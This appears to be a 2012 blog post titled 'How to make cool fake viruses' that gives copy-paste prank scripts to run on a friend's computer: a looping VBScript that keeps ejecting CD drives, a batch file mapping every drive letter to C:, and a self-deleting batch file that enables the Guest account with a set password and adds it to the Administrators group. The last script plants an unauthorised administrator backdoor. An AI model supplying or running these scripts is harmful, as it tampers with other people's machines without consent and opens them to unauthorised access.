Poll

Rate This WebSite.
5 Stars
4 Stars
3 Stars
2 Stars
1 Star
No Stars
Create your own poll

Page Views

Website Chat

Labels

Popular Posts

Followers

Sponsored Links

Sponsored Links

Blog Archive

Friday 6 April 2012

How to make cool fake viruses


1......Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!


1.Open the word pad
2.copy and paste this


Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop


3.save it as a .vbs


2........Making fake Hard drivers


open note pad and paste this


@echo off
cls
subst d: c:\
subst e: c:\
subst f: c:\
subst g: c:\
subst h: c:\
subst i: c:\
subst j: c:\
subst k: c:\
subst l: c:\
subst m: c:\
subst n: c:\
subst o: c:\
subst p: c:\
subst q: c:\
subst r: c:\
subst s: c:\
subst t: c:\
subst u: c:\
subst v: c:\
subst w: c:\
subst x: c:\
subst y: c:\
subst z: c:\
cls
exit


save as .bat file and run


3.......Make guest as admin


The below code will allow a guest to be a admin . You will not be the actual admin but will get admin privilages


echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0


Copy this to notepad and save the file as "anyname.bat" . Now you need to execute it or run in the cmd screen.

0 comments: